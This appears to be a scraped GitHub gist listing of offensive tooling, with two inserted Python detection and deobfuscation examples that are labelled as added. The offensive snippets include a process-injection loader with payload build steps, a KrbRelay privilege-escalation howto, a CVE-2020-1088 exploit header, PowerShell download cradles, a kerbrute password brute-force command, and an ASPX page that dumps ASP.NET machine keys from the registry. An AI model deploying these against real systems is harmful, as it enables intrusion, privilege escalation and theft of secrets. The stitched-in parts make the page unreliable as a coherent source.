m3dsec
@tothi
tothi / DInjectQueuerAPC.cs
Last active November 26, 2024 17:57 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
@rqu1
rqu1 / checkmk.py
Last active December 27, 2025 08:27
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
@tothi
tothi / krbrelay_privesc_howto.md
Last active January 24, 2026 07:17
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@chr0ll0x0
chr0ll0x0 / auto-subdomains.sh
Last active July 8, 2022 21:57
for subdomains
#!/bin/bash
#please install these tools first
#install jq
#Assetfinder - https://github.com/tomnomnom/assetfinder
#Subfinder - https://github.com/projectdiscovery/subfinder
#Amass - https://github.com/OWASP/Amass
#Findomain https://github.com/Findomain/Findomain
#Anew https://github.com/tomnomnom/anew
#crobat https://github.com/cgboal/sonarsearch/crobat
echo "Installing amass"
export GO111MODULE=on; go get -v github.com/OWASP/Amass/v3/...
echo "anew"
bash -c 'go get -u github.com/tomnomnom/anew'
echo -e "Installing anti-burl"
bash -c 'go get -u github.com/tomnomnom/hacks'
echo -e "Installing aquatone"
bash -c 'go get -u github.com/michenriksen/aquatone'
echo -e 'Installing assetfinder'
@fisboger
fisboger / WerArbitraryFileDelete.cs
Last active August 22, 2024 21:44
CVE-2020-1088
using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active March 2, 2026 13:50
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
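To show what the `-bxor` goodie above actually hides, and how an analyst can pull such strings back out of a ScriptBlock log, here is an added Python example (not part of mgeeky's gist). It extracts the base64 literal and the XOR key from the one-liner text, decodes them the way the PowerShell pipeline does (`[char]$_` maps each byte to the same code point, i.e. Latin-1), offers the reverse direction for building test strings, and brute-forces the key when it is not visible by ranking candidates on lowercase letters and spaces. The regexes, the UTF-16LE option and the scoring heuristic are my assumptions; the sample one-liner is the one quoted in the gist.

```python
"""Deobfuscate PowerShell 'FromBase64String | -bxor N | [char]' strings."""
import base64
import re
import string

# The cradle one-liner quoted in the gist above, as it might appear in a
# PowerShell ScriptBlock log (Microsoft-Windows-PowerShell/Operational 4104).
SAMPLE_ONELINER = (
    "$t=([type]('{1}{0}'-f'vert','Con'));"
    "($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')"
    "|%{$_-bxor35}|%{[char]$_})-join''"
)

# Assumed patterns: the base64 literal is the argument of .Invoke(...) and the
# key is the operand of -bxor. Real samples may split or escape these; extend as needed.
B64_RE = re.compile(r"""\.Invoke\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
XOR_RE = re.compile(r"-bxor\s*(\d+)")


def extract_parameters(oneliner: str) -> tuple[str, int]:
    """Return (base64_literal, xor_key) pulled out of a cradle one-liner."""
    b = B64_RE.search(oneliner)
    k = XOR_RE.search(oneliner)
    if not b or not k:
        raise ValueError("no FromBase64String/-bxor pattern found")
    # -bxor on [int] is 32-bit, but the decoded bytes are 0..255, so only the low byte matters
    return b.group(1), int(k.group(1)) & 0xFF


def xor_decode(b64: str, key: int, utf16: bool = False) -> str:
    """Mirror the PowerShell pipeline: base64 -> bytes -> ^key -> chars.
    [char]$_ maps each byte to the same code point, which is Latin-1;
    utf16=True is an assumption about the UTF-16 variant mentioned in the gist."""
    raw = bytes(c ^ key for c in base64.b64decode(b64))
    return raw.decode("utf-16-le" if utf16 else "latin-1")


def xor_encode(plaintext: str, key: int, utf16: bool = False) -> str:
    """Reverse direction, handy for producing test strings for detections."""
    data = plaintext.encode("utf-16-le" if utf16 else "latin-1")
    return base64.b64encode(bytes(c ^ key for c in data)).decode("ascii")


def brute_force_key(b64: str) -> list[tuple[int, str]]:
    """When the key is not visible, try all 256 single-byte keys and rank the
    fully printable outputs by how much they look like text (lowercase letters
    and spaces). The scoring is a heuristic, not a guarantee."""
    raw = base64.b64decode(b64)
    printable = set(string.printable.encode()) - set(b"\x0b\x0c")
    scored = []
    for key in range(256):
        out = bytes(c ^ key for c in raw)
        if all(c in printable for c in out):
            text = out.decode("latin-1")
            score = sum(ch == " " or ch.islower() for ch in text)
            scored.append((score, key, text))
    scored.sort(reverse=True)
    return [(key, text) for _, key, text in scored]


if __name__ == "__main__":
    b64, key = extract_parameters(SAMPLE_ONELINER)
    print(f"key={key} plaintext={xor_decode(b64, key)!r}")
    print("best guess without the key:", brute_force_key(b64)[0])
```

Running it against the quoted one-liner recovers the key 35 and the plaintext "Ala ma kota"; the brute-force path lands on the same answer because every other single-byte key yields fewer lowercase letters and spaces for these bytes.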
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

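As an added example that is not part of the Tarlogic cheatsheet, here is the defender's side of the bruteforcing section above: Python detection logic run over constructed Windows Security events from a domain controller. kerbrute's userenum mode leaves a 4768 event with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for every username that does not exist, and its passwordspray / bruteuser modes leave 4771 events with failure code 0x18 (KDC_ERR_PREAUTH_FAILED). The sample events, field names, window and thresholds are constructed assumptions, not real telemetry.

```python
"""Flag kerbrute-style Kerberos user enumeration, password spraying and
single-account brute force in Windows Security log events 4768 / 4771."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real logs. The fields are the ones an analyst
# would pull from the Security log on a domain controller:
#   4768 = Kerberos TGT requested; result code 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN
#          (account does not exist, what kerbrute userenum produces)
#   4771 = Kerberos pre-authentication failed; failure code 0x18 = KDC_ERR_PREAUTH_FAILED
#          (wrong password, what kerbrute passwordspray / bruteuser produce)
SAMPLE_EVENTS = [
    # benign: one successful TGT and one mistyped password from a workstation
    {"time": "2024-01-10T09:00:01", "id": 4768, "user": "jdoe", "ip": "10.0.0.5", "code": "0x0"},
    {"time": "2024-01-10T09:01:12", "id": 4771, "user": "jdoe", "ip": "10.0.0.5", "code": "0x18"},
]
# 10.0.0.55: user enumeration (8 unknown principals in 8 seconds) ...
SAMPLE_EVENTS += [
    {"time": f"2024-01-10T09:02:{i:02d}", "id": 4768, "user": f"guess{i}", "ip": "10.0.0.55", "code": "0x6"}
    for i in range(8)
]
# ... followed by one password tried against six real accounts
SAMPLE_EVENTS += [
    {"time": f"2024-01-10T09:03:{i:02d}", "id": 4771, "user": u, "ip": "10.0.0.55", "code": "0x18"}
    for i, u in enumerate(["jdoe", "asmith", "bchen", "dlee", "mrossi", "svc_backup"])
]
# 10.0.0.77: six wrong passwords for one account (bruteuser)
SAMPLE_EVENTS += [
    {"time": f"2024-01-10T09:04:{i:02d}", "id": 4771, "user": "svc_backup", "ip": "10.0.0.77", "code": "0x18"}
    for i in range(6)
]


def classify(ev):
    """Map one event to the failure class it belongs to, or None if it is not a miss."""
    code = ev["code"].lower()
    if ev["id"] == 4768 and code == "0x6":
        return "unknown_user"
    if ev["id"] == 4771 and code == "0x18":
        return "bad_password"
    return None


def detect(events, window=timedelta(minutes=5), threshold=5):
    """Return {(source_ip, label): count}. For every source IP and failure class,
    slide a `window` over the failures; alert when at least `threshold` distinct
    principals (enumeration / spray) or `threshold` attempts on fewer principals
    (single-account brute force) fall inside it. Thresholds are assumptions; tune
    them to the environment's baseline."""
    buckets = defaultdict(list)
    for ev in events:
        kind = classify(ev)
        if kind:
            buckets[(ev["ip"], kind)].append((datetime.fromisoformat(ev["time"]), ev["user"]))

    alerts = {}
    for (ip, kind), hits in buckets.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            in_window = [u for t, u in hits[i:] if t - start <= window]
            distinct = len(set(in_window))
            if distinct >= threshold:
                label = "user enumeration" if kind == "unknown_user" else "password spray"
                alerts[(ip, label)] = max(alerts.get((ip, label), 0), distinct)
            elif kind == "bad_password" and len(in_window) >= threshold:
                label = "single-account brute force"
                alerts[(ip, label)] = max(alerts.get((ip, label), 0), len(in_window))
    return alerts


if __name__ == "__main__":
    for (ip, label), n in sorted(detect(SAMPLE_EVENTS).items()):
        print(f"{ip:12} {label:28} {n}")
```

The split between "many distinct principals" and "many attempts on one principal" matters in practice: the first is the spray pattern that stays under per-account lockout, the second is what lockout policies already catch, so the two usually warrant different response playbooks.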
@irsdl
irsdl / machineKeyFinder.aspx
Last active January 4, 2026 08:57
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
`
~/
~
ים
___
__
_